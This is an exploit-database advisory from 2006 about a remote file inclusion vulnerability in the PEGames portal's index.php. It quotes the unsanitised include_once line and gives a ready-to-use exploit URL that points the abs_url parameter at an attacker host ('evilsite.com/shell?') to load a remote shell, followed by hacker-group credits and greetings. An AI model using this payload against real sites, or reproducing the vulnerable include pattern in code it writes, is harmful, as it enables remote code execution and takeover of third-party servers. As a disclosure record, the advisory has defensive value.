id: 1203
date: 11/23/2006
title: PEGames (index.php) Remote File Include Vulnerability
author: DeltahackingTEAM
cves: 

=====================================================
PEGames (index.php) Remote File Include Vulnerability
=====================================================



**********************************************************************************************************

* Portal Name : PEGames

* Class = Remote File Inclusion ;

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special  thanks of my financial sponser Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

include_once("$abs_url/display.php");
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/Index.php?abs_url=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc




#  0day.today [2023-03-26]  #